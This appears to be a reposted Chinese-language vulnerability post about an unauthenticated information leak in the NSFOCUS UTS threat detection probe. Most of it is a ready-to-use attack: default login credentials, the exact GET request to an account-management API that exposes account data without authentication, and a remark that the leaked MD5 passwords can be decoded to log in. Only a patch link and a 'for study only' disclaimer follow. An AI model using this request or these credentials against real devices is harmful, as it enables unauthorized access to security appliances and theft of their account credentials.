绿盟 UTS综合威胁探针 信息泄露
2023-6-6 08:2:40 Author: 才疏学浅的H6(查看原文) 阅读量:59 收藏

漏洞说明

绿盟综合威胁探针(NSFOCUS UTS),是一款面向全行业的全流量威胁检测探针,集绿盟多年安全研究及威胁检测能力于一身,运用规则引擎、虚拟沙箱、威胁情报、机器学习等技术,具备识别广泛、检测精准、互联互通的特点,可面向不同场景检测和分析高级威胁,回溯安全事件。

绿盟 UTS综合威胁探针 存在未授权访问接口泄露敏感信息。

影响版本

绿盟 UTS综合威胁探针

漏洞复现

默认账号

admin/[email protected]auditor/auditor

payload:

/webapi/v1/system/accountmanage/account
GET /webapi/v1/system/accountmanage/account HTTP/1.1Host: ip:portSec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

密码为MD5编码,解码后可进行登录

修复建议

安装官方补丁:

http://update.nsfocus.com/update/listBsaUtsDetail/v/F02

本文章仅用于学习交流,不得用于非法用途

星标加关注,追洞不迷路

文章来源: http://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486118&idx=1&sn=7fd1aaa411c8c07d07b03c6248e9801e&chksm=c1f92514f68eac021f4ad13ffbd7ca1b4a52915d23f4189eee31879799986fc10db8d6f21bfe#rd
如有侵权请联系:admin#unsafe.sh